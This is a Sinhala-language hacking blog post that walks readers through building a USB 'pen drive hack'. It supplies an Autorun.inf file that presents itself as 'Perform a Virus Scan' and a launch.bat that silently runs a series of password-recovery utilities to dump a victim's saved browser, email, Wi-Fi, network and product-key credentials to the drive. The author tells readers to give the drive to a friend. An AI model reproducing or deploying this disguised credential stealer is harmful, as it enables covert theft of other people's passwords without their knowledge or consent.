-->

පෙන් එකෙන් හැක් කරමු.


 මුලින්ම කියන්න ඕනෙ ඔන්න අපි ga Domain එකකුත් දාගත්තා. දැන් නම් ඉතින් පොඩි ගතියක් තියෙනවා. හා හා අරවා මේවා ඕනෙ නෑ වැඩේ ගැන බලමු නෙ...
මෙන්න ගෙනාවා පට්ට හැකින් ටූල් එකක්. මේවගේ එ්වට උබලා කැමතියිනෙ. ඒ නිසාම තමයි දෙන්නෙ. හරි එහෙනම් ඉතින් මේකෙන් කරන්න පුළුවන් වැඩ ටික දාලාම පටන් ගන්නම්.

මෙන්න මේ ටික මෙකෙන් කරගන්න පුළුවන්.


  • Visited Link List
  • Internet Explora Cache List
  • Internet Explora Password List
  • Instance Massengers Account List
  • Installed Windows Update List
  • Mozilla cache List
  • cookie list
  • Mozilla History List
  • Search Queary List
  • Adapter Report
  • Network Password Report
  • TCP/UDP Port List
  • Product Key List
  • Protected Storage Password List
  • PST password List
  • Startup Programme List
  • Video Cache List
මේ ටික කරගත්තා කියන්නෙ ගොඩනෙ. හරි එහෙනම් වැඩේට බහිමු.


1. මුලින්ම නෝට්පෑඩ් එක ඕපන් කරගෙන පහල තියන කෝඩ් එක ඒකට කොපි කරගන්න.

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

2. දැන් මේ ෆයිල් එක Autorun.inf කියලා කැමති තැනක සේව් කරගන්න.

3. දැන් ආපහු නෝට්පෑඩ් එක ඕපන් කරගෙන මේ කෝඩ් එක ඒකට දාගන්න.

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt

4. දැන් මේ ෆයිල් එක launch.bat කියන නමින් සේව් කරගන්න.

හරි එහෙනම් වැඩේ භාගයක් ඉවරයි. දැන් පෙන් එකට මේ හදාගත්ත ෆයිල් දෙක ‍කොපි කරගන්න. දැන් පෙන් එකේ තියෙන්න ඕනෙ Autorun.inf, launch.bat කියන ෆයිල් දෙක.

හරි එහෙනම් දැන් පෙන් එක යාළුවට වගේ දීලා බලන්න. යාළුවා මේ ෆයිල් එක ඕපන් කලාම වැඩේ ගොඩ. නෑ නෑ එහෙම කරන්න ඕනෙ නෑ. මේක ඔටෝරන් වෙනවා. ඒ නිසා පෙන් එක ගහලා Autorun Window එකෙන් Perform a Virus Scan තේරුව ගමන් පෙන් එක ඇතුලෙ අළුත් ෆයිල් හැදිලා පාස්වර්ඩ් සේව් වෙනවා.

හරි එහෙනම් මම කැපුනා. ආපහු මේ වගේ දෙයක් අරගෙන එන්නම්.

මගෙ බ්ලොග් පෝස්ට් කොපි කරාට කමක් නෑ, ඒත් සෝර්ස් එක නම් දාන්න ඕනෙ හොදේ. සමහරු නම් නමුත් වෙනස් කරලා තමන් ලිවුවා වගේ පෙන්නනවා. කමක් නෑ ඉතින්. දන්නො දනිති කියලාවත් කියමු


Related Posts